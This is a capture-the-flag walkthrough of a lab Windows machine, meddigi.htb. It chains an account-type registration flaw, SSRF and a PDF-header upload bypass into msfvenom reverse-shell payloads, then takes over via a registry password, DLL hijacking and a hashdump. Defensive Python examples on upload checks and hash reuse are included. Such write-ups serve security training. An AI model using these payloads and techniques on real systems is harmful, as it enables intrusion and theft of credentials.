Basic info
Port scan: 80 and 443, plus 5985 (WinRM), which the default port list misses (a full `-p-` scan catches it):

```
$ nmap -sC -sV -Pn 10.10.11.238
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-30 13:34 CST
Nmap scan report for meddigi.htb (10.10.11.238)
Host is up (0.076s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
|_http-server-header: Microsoft-IIS/10.0
443/tcp open  https?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.18 seconds

$ nmap -p 5985 10.10.11.238
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-30 13:36 CST
Nmap scan report for meddigi.htb (10.10.11.238)
Host is up (0.22s latency).

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
```
Ports 80/443 redirect to the hostname, so a hosts entry is needed:

```
10.10.11.238 meddigi.htb
```
The site is an online medical service:
Subdomain scan

Fuzzing the Host header finds portal (add portal.meddigi.htb to the hosts file as well):

```
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "https://meddigi.htb/" -H 'Host: FUZZ.meddigi.htb'

[Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 2642ms]
    * FUZZ: portal
```
portal

portal is the doctor login page:
MedDigi

Registering and logging in on the main site gives what looks like a patient account; after a doctor is assigned you can consult online:
Acctype

Inspecting the registration request reveals an Acctype parameter, which defaults to 1. Registering with it changed to 2 and logging in, we are a doctor, and the patient selector lists the normal patient account registered earlier. The server trusts a client-supplied account type at registration, so the role is effectively chosen by the user:
But the doctor/patient interaction on the main site offers nothing much to exploit.
portal

We already hold a doctor identity on the main site. Simply reusing the main site's cookie on portal works, since portal accepts the same session cookie, and we can browse it normally:
SSRF

Testing every feature: Prescription accepts a URL, which gives SSRF. Basic probing of localhost shows port 8080 answering with the internal entry point of this feature; internally it is an aspx page that takes a file parameter directly, and it reveals a PDF path not visible from outside:
Upload report allows file upload. There is validation that only permits PDFs, but it is easily bypassed by prepending a PDF file header:

Checking through the SSRF confirms that the file extension is stored unchanged:

So we can try combining the file upload with the SSRF to get a webshell.
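The upload check and stored-name behaviour described above, as an added Python example that is not part of this write-up or of the application's real code: a header-only PDF check beside a stricter one that allowlists the extension, requires a PDF trailer, and lets the server pick the stored name. The function names, the random-prefix scheme and the sample ASPX payload are my assumptions.

```python
import os
import secrets

PDF_MAGIC = b"%PDF-"
PDF_TRAILER = b"%%EOF"
ALLOWED_EXT = {".pdf"}


def craft_bypass_file(aspx_payload: bytes) -> bytes:
    """Attacker side: prepend a PDF header so a header-only check passes."""
    return b"%PDF-1.4\n" + aspx_payload


def weak_is_pdf(data: bytes) -> bool:
    """Assumed shape of the bypassed check: magic bytes only."""
    return data.startswith(PDF_MAGIC)


def weak_store_name(client_filename: str) -> str:
    """Stored as <random>_<original name>: the client's extension survives,
    which is what the SSRF view of the upload directory showed."""
    return f"{secrets.token_hex(16)}_{os.path.basename(client_filename)}"


def weak_upload(client_filename: str, data: bytes) -> str:
    if not weak_is_pdf(data):
        raise ValueError("not a pdf")
    return weak_store_name(client_filename)


def strict_is_pdf(client_filename: str, data: bytes) -> bool:
    """Extension allowlist, magic bytes and a trailer near the end of the file."""
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False
    if not data.startswith(PDF_MAGIC):
        return False
    # A real PDF carries %%EOF at the end; a header pasted onto ASPX code does not.
    if PDF_TRAILER not in data[-1024:]:
        return False
    return True


def strict_store_name() -> str:
    """The server chooses name and extension; nothing from the client survives,
    so even a smuggled script can never be stored with an executable extension."""
    return f"{secrets.token_hex(16)}.pdf"


def strict_upload(client_filename: str, data: bytes) -> str:
    if not strict_is_pdf(client_filename, data):
        raise ValueError("rejected")
    return strict_store_name()


if __name__ == "__main__":
    # Constructed sample: a minimal ASPX page behind a fake PDF header.
    shell = craft_bypass_file(b'<%@ Page Language="C#" %>\n<script runat="server"></script>\n')
    print("weak check accepts shell.aspx:", weak_is_pdf(shell))
    print("strict check accepts shell.aspx:", strict_is_pdf("shell.aspx", shell))
```

The trailer check on its own is not a defence (an attacker can append `%%EOF` too); the control that actually kills this chain is the forced rename to `.pdf`, together with serving uploads from a location that IIS will not hand to the ASP.NET handler.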
webshell

First get the stored path via the SSRF, then request the aspx through the SSRF to trigger the shell. The shell comes back as svc_exampanel; migrate into a fresh process so the IIS worker does not take the session down with it:

```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.6 LPORT=443 -f aspx -o shell.aspx

http://127.0.0.1:8080/ViewReport.aspx?file=30ef5746-5da5-414a-b55c-35d0a9fd9f58_shell.aspx

meterpreter > execute -H -f notepad
Process 1060 created.
meterpreter > migrate 1060
```
user flag

The user flag is on svc_exampanel's desktop:
ExaminationPanel

In the IIS directories, the user name points to ExaminationPanel; download the assembly for local analysis:

```
meterpreter > cd c:\\inetpub\\ExaminationPanel\\ExaminationPanel\\bin
meterpreter > download ExaminationManagement.dll
```
ExaminationManagement.dll

According to the decompiled code, it reads a key from the registry:
RegistryKey

Query the registry path taken from the code to get the key:

```
reg query HKLM\Software\MedDigi

1g0tTh3R3m3dy!!
```
devdoc

Trying the key as a password against the local users, it turns out devdoc uses it:

```
Administrator
devdoc
svc_exampanel
svc_meddigi
svc_meddigiportal

evil-winrm -i 10.10.11.238 -u devdoc -p '1g0tTh3R3m3dy!!'
```
ReportManagement

The running processes include ReportManagement; locate the binary and download it for local analysis:

```
*Evil-WinRM* PS C:\Program Files\ReportManagement> download ReportManagement.exe
```
upload

Decompiling shows the commands accepted on port 100. Among them, upload tries to load externalupload.dll from C:\Program Files\ReportManagement\Libraries (forwarding the port and tracing the process dynamically makes this easier to spot):
That DLL does not exist, and our current devdoc user has write permission on the directory:

So the path is clear: DLL hijacking. Drop a malicious DLL there and trigger it through upload.
DLL hijacking

Generate a malicious DLL, upload it, and trigger the load. The service runs as Administrator, so the callback arrives with that account:

```
# forward the port so it is easy to reach and trigger
meterpreter > portfwd add -l 9999 -p 100 -r 127.0.0.1

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.6 LPORT=443 -f dll -o externalupload.dll

*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> upload externalupload.dll

# be quick, the dll gets cleaned up automatically
nc 127.0.0.1 9999
# any argument will do, just trigger upload
upload xxx
```
root flag

On the Administrator desktop:
hashdump

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d636ff292d255b1a899123876635a22:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
devdoc:1002:aad3b435b51404eeaad3b435b51404ee:ba864f62df01b1115c4ce69988e31c83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_exampanel:1007:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f:::
svc_meddigi:1006:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f:::
svc_meddigiportal:1008:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:78601e0139a6d95351626a66a22c4b65:::
```

Note that the three svc_ accounts share one NT hash, i.e. one password, and DefaultAccount and Guest carry the empty-password hash.
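A small parser for the dump above, added here as an example and not part of the original write-up: it reads pwdump-format lines and flags what is worth checking first in a post-exploitation report, accounts that share an NT hash (password reuse), accounts with the empty-password hash, and any real LM hashes. The sample input is the dump from this page; the function names are my own.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/disabled LM password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Sample input: the hashdump from this write-up, embedded so the example runs offline.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d636ff292d255b1a899123876635a22:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
devdoc:1002:aad3b435b51404eeaad3b435b51404ee:ba864f62df01b1115c4ce69988e31c83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_exampanel:1007:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f:::
svc_meddigi:1006:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f:::
svc_meddigiportal:1008:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:78601e0139a6d95351626a66a22c4b65:::
"""


def parse_hashdump(text: str) -> dict:
    """Parse user:rid:lm:nt::: lines into {user: {"rid", "lm", "nt"}}.
    Lines that are not in that shape (e.g. the meterpreter prompt) are skipped."""
    users = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        users[parts[0]] = {"rid": int(parts[1]), "lm": parts[2].lower(), "nt": parts[3].lower()}
    return users


def shared_nt_hashes(users: dict) -> dict:
    """NT hashes used by more than one account (same password), empty hash excluded."""
    by_hash = {}
    for user, rec in users.items():
        by_hash.setdefault(rec["nt"], []).append(user)
    return {h: sorted(v) for h, v in by_hash.items() if len(v) > 1 and h != EMPTY_NT}


def empty_password_accounts(users: dict) -> list:
    return sorted(u for u, r in users.items() if r["nt"] == EMPTY_NT)


def lm_hashes_present(users: dict) -> list:
    """Accounts whose LM hash is not the empty marker; these crack far faster."""
    return sorted(u for u, r in users.items() if r["lm"] != EMPTY_LM)


def to_hashcat_lines(users: dict) -> list:
    """user:nthash lines, suitable for hashcat -m 1000 --username."""
    return [f"{u}:{r['nt']}" for u, r in sorted(users.items())]


if __name__ == "__main__":
    dump = parse_hashdump(HASHDUMP)
    print("shared NT hashes:", shared_nt_hashes(dump))
    print("empty passwords:", empty_password_accounts(dump))
    print("LM hashes present:", lm_hashes_present(dump))
```

The shared-hash check is the useful one here: a single cracked or relayed password for any svc_ account is valid for all three.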
Last updated: 2024-03-11 09:51:18